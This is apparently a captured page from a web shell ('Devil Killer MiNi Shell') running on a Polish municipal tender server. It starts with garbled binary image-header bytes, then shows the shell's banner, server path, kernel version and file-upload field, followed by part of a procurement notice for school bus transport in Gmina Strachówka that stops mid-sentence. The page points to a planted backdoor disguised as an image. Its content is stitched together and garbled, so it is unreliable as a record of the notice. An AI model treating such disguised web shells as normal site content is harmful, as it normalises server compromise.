JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240730/0043677701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> DOWOŻENIE UCZNIÓW DO SZKÓŁ NA TERENIE GMINY STRACHÓWKA WRAZ Z ZAPEWNIENIEM OPIEKI NAD DOWOŻONYMI DZIEĆMI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STRACHÓWKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582724</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Cypriana Kamila Norwida 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strachówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-282</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">257562828</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">257562829</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@strachowka.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.strachowka.4bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOWOŻENIE UCZNIÓW DO SZKÓŁ NA TERENIE GMINY STRACHÓWKA WRAZ Z ZAPEWNIENIEM OPIEKI NAD DOWOŻONYMI DZIEĆMI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2acbf354-479e-46ae-853b-5e46ce4a0921</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00436777</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00041635/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowożenie uczniów do szkół na terenie Gminy Strachówka wraz z zapewnieniem opieki nad dowozonymi dziećmi w roku szkolnym 2023/2024 - Dostęp do edukacji publicznej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://strachowka.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://strachowka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://strachowka.ezamawiajacy.pl zwanej dalej Platformą. Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1 niniejszej<br/>SWZ<br/>Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy zakupowej. Instrukcja została zamieszona bezpośrednio na ww. Platformie.<br/>Informacja o sposobie porozumiewania się z wykonawcami<br/>1. W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej.<br/>2. Pytania do SWZ należy zadawać za pośrednictwem platformy zakupowej zamawiającego przez link: https://strachowka.ezamawiajacy.pl. Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem.<br/>3. Oferta wraz z załącznikami musi być złożona w postaci elektronicznej w systemie informatycznym dostępnym pod adresem https://strachowka.ezamawiajacy.pl.<br/>5. Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową zamawiającego, opisane zostały w Instrukcji dla<br/>wykonawców która jest udostępniana na platformie zakupowej zamawiającego.<br/>6. Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z wykonawcami:<br/>Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym pod adresem<br/>https://strachowka.ezamawiajacy.pl, zgodnie z poniższą kolejnością. Rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. Mając to na uwadze, zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca biorący udział w postępowaniu prowadzonym drogą elektroniczną w systemie zakłada konto, wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. Po założeniu konta wykonawca ma możliwość złożenia oferty w<br/>postępowaniu.<br/>7. Zamawiający wskazuje informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych, dotyczące systemu dostępnego pod adresem https://strachowka.ezamawiajacy.pl:<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta<br/>• Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge<br/>• Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych jest: Gmina Strachówka, reprezentowana przez Wójta Gminy Strachówka, z siedzibą: ul. C.K.Norwida 6, 05-282 Strachówka, tel. (25) 756 28 28;<br/>e-mail: zamowienia.publiczne@strachowka.com.pl<br/>2. Na mocy art. 37 ust. 1 lit. a) RODO Administrator wyznaczył Inspektora Ochrony Danych (IOD) – Pana Krzysztofa Mikulskiego , Z IOD można kontaktować się pod adresem mail: iodkm@tbdsiedlce.pl.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr ZP.271.4.2024 <br/>4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych (t.j. Dz. U. z 2023 r. poz. 1605 z późn. zm.), dalej „ustawa PZP” , związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencją niepodania danych osobowych może być brak możliwości udzielenia zamówienie publicznego. W szczególności niepodanie stosownych danych osobowych może skutkować odrzuceniem oferty wykonawcy.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy PZP. <br/>6. Administrator może udostępnić Państwa dane innym podmiotom na podstawie umów powierzenia danych zawartych z podmiotami świadczących usługi na rzecz Administratora. <br/>7. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>8.	Przysługuje Pani/Panu, z wyjątkami zastrzeżonymi przepisami prawa, możliwość:<br/>•	dostępu do danych osobowych jej/jego dotyczących oraz otrzymania ich kopii o którym mowa w art.. 15 RODO *,<br/>• żądania sprostowania lub uzupełnienia danych osobowych na podstawie z art. 16 RODO, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą (art. 19 ust. 2 PZP)<br/>•	w związku z art. 18 RODO żądania ograniczenia przetwarzania danych osobowych przy czym prawo to nie ma zastosowania w odniesieniu do przechowywania, przetwarzania danych w celu zapewnienia korzystania z środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego**.<br/>9.	Nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10.	Z powyższych uprawnień można skorzystać w siedzibie Administratora, kierując korespondencję na adres Administratora lub drogą elektroniczną pisząc na adres: iod-km@tbdsiedlce.pl.<br/>11.	Przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Państwa danych osobowych. Organem właściwym dla ww. skargi jest:<br/>Prezes Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa<br/>12.	Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">B) Dane osobowe wykonawcy będą przetwarzane na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „DOWOŻENIE UCZNIÓW DO SZKÓŁ NA TERENIE GMINY STRACHÓWKA WRAZ Z ZAPEWNIENIEM OPIEKI NAD DOWOŻONYMI DZIEĆMI”<br/>c) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/>d) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>e) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w załączniku nr 3 do SWZ.<br/>f) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim<br/>dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO<br/>- obowiązek informacyjny wynikający z art. 14 RODO .<br/>h) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO<br/>i) Zamawiający informuje, że:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp,<br/>- Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO zebranych w toku postępowania o udzielenie zamówienia.<br/>- W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO , zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania.<br/>- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na dowozie uczniów z miejscowości położonych na terenie Gminy Strachówka do niżej wymienionych placówek oświatowych zlokalizowanych na terenie Gminy Strachówka oraz odwóz po zajęciach na podstawie zakupionych biletów miesięcznych w roku szkolnym 2024/2025:<br/>- Szkoła Podstawowa im. Rzeczpospolitej Norwidowskiej w Strachówce, <br/>ul. Kmiecińskiego 3, 05 - 282 Strachówka<br/>Zapewnienie opiekunów leży po stronie Wykonawcy.<br/>Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała lub śmierć czy szkoda materialna spowodowana działalnością Wykonawcy.<br/>Przewóz będzie polegał na zabieraniu uczniów z wyznaczonych przystanków na określonych trasach i ich przewóz do placówek oświatowych na określoną godzinę i z powrotem. Uczeń musi zostać dowieziony najwcześniej 30 minut przed rozpoczęciem zajęć (rozpoczęcie zajęć godz. 8:30) <br/>Wykonawca zobowiązany będzie do sprzedaży biletów miesięcznych oddzielnie na każdy miesiąc wg przekazanej listy uczniów. Usługa przewozu osób realizowana będzie na trasach obejmujących miejscowości, z których dojeżdżają uczniowie z wyznaczonych przystanków do placówek oświatowych na terenie Gminy Strachówka i z powrotem we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego 2024/2025. Usługa będzie świadczona w dni nauki szkolnej. Wykonawca zobowiązany jest również zapewnić transport w dni, w które uczniowie będą odrabiali inne dni zwolnione z nauki szkolnej.<br/>Usługa nie będzie świadczona w sytuacji zamknięcia placówek oświatowych zlokalizowanych na terenie Gminy Strachówka z powodów epidemiologicznych bądź innych powodów, w wyniku których zajęcia dydaktyczne i wychowawcze będą odbywały się za pośrednictwem środków porozumiewania się na odległość.<br/>Zamawiający dopuszcza aby Wykonawca wykonywał przewóz uczniów autobusami kursowymi w komunikacji regularnej ogólnodostępnej – jako publiczny przewóz osób, zgodnie z obowiązującym go rozkładem jazdy podanym do publicznej wiadomości na przystankach autobusowych. Wykonawca zapewni wykwalifikowanych i posiadających odpowiednie kwalifikacje i dokumenty kierowców.<br/>Usługa świadczona będzie taborem Wykonawcy. Wykonawca zobowiązany jest dostosować do zamówienia odpowiednią liczbę środków transportu w celu realizacji przewozów (2 autobusy i bus lub 3 autobusy) zgodnie z rozkładem jazdy i ilością zakupionych biletów miesięcznych. Wykonawca powinien posiadać pojazdy, które zapewnią prawidłowe wykonanie zamówienia – dysponować autobusami o ilości zapewniającej przewóz przewidywanej liczby uczniów na poszczególnych trasach <br/>z zapewnieniem miejsc siedzących dla tych uczniów.<br/>Dowożenie uczniów do Szkół Podstawowych na terenie Gminy Strachówka obejmuje następujące trasy:<br/>TRASA Nr 1. Strachówka (szkoła) – Kąty Wielgi – Borucza (przez Kąty Czernickie i Kąty- Miąski) - długość trasy 62,8 km,<br/>TRASA Nr 2. Strachówka (szkoła) – Równe - Krawcowizna (Zabiel- skrzyżowanie z drogą na Sulejów) – Księżyki - Osęka - długość trasy 34,0 km, <br/>TRASA Nr 3. Strachówka (szkoła) – Jadwisin – droga krajowa nr 50 – Rozalin od Młyniska (nawrót przy Rozalin 6) – Młynisko - Józefów - Annopol (nawrót przy Annopol 6) – Rozalin (szkoła) – Strachówka (szkoła) - długość trasy 43,8 km,<br/>TRASA Nr 4. Strachówka (szkoła) – Zofinin - Osęka - Wiktoria - długość trasy 35,0 km, <br/>TRASA Nr 5. Strachówka (szkoła) – Piaski - długość trasy 16,6 km.<br/>Łączna dzienna długość trasy (przywozy i odwozy) wynosi 192,2 km.<br/>Lista uczniów dojeżdżających w roku szkolnym 2024/2025:<br/>1.	Księżyki - 15 uczniów<br/>2.	Zofinin - 8 uczniów<br/>3.	Osęka - 4 uczniów<br/>4.	Ruda Czernik - 1 uczeń<br/>5.	Wiktoria - 5 uczniów<br/>6.	Równe - 23 uczniów<br/>7.	Krawcowizna - 10 uczniów<br/>8.	Kąty Czernickie - 6 uczniów<br/>9.	Kąty Wielgi - 6 uczniów<br/>10.	Kąty- Miąski - 5 uczniów<br/>11.	Borucza - 3 uczniów<br/>12.	Strachówka (ul. Kościuszki) - 1 uczeń<br/>13.	Piaski - 4 uczniów<br/>14.	Rozalin - 13 uczniów<br/>15.	Józefów - 9 uczniów<br/>16.	Młynisko - 6 uczniów<br/>17.	Annopol - 8 uczniów<br/>18.	Jadwisin - 8 uczniów<br/>Przewidywana liczba osób dojeżdżających: 135.<br/>Szczegółowy wykaz linii oraz rozkłady jazdy zostaną uzgodnione z wybranym Wykonawcą. <br/>Dzieci dowożone będą trzema autobusami lub dwoma autobusami i busem. <br/>Trasa nr 1 – autobus nr 1. <br/>Trasa nr 2 – autobus nr 1. <br/>Trasa nr 3 – autobus nr 2. <br/>Trasa nr 4 – autobus/bus nr 3. <br/>Trasa nr 5 – autobus/bus nr 3.<br/>Istnieje możliwość łączenia tras.<br/>Przykładowe rozkłady jazdy na w/w trasach znajdują się w załączniku nr 9 - wykaz tras dowozu dzieci.<br/>Liczba uczniów na poszczególnych trasach jest liczbą, która może ulec zmianie w trakcie trwania umowy, na co Wykonawca musi być przygotowany. W przypadku zmiany liczby uczniów wynagrodzenie Wykonawcy wynikać będzie z faktycznej ilości zakupionych biletów miesięcznych. Zamawiający zastrzega sobie prawo zmiany tras przewozu dzieci, ilości przewozów w tygodniu, terminów ich wykonywania oraz liczby dzieci, ze względu na okoliczności, których strony nie mogły przewidzieć w chwili zawarcia umowy, <br/>a podyktowane potrzebami zamawiającego wynikającymi z realizacji obowiązku zapewnienia uczniom dowozu do szkoły.<br/>Wykonawca zobowiązany będzie do punktualnego wykonywania usługi, posiadania taboru zastępczego w przypadku awarii wskazanego pojazdu. W przypadku awarii jednego z pojazdów Wykonawca zobowiązany jest podstawić niezwłocznie pojazd zastępczy nie gorszy od wskazanego w ofercie.<br/>Wykonawca zobowiązany będzie do wykonywania usługi sprawnymi technicznie pojazdami posiadającymi aktualne badania techniczne. Ponadto Wykonawca będzie dbał o czystość oraz o właściwy stan techniczny pojazdów zapewniający odpowiedni komfort jazdy.<br/>Wykonawca zobowiązany będzie wykonywać zamówienie zgodnie z zasadami <br/>i obowiązkami wynikającymi z ustawy z dnia 6 września 2001 roku o transporcie drogowym oraz ustawy z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym. Przedmiot niniejszego zamówienia musi być wykonany zgodnie z innymi aktualnie obowiązującymi przepisami prawa w zakresie obowiązującym. <br/><br/>Wszystkie 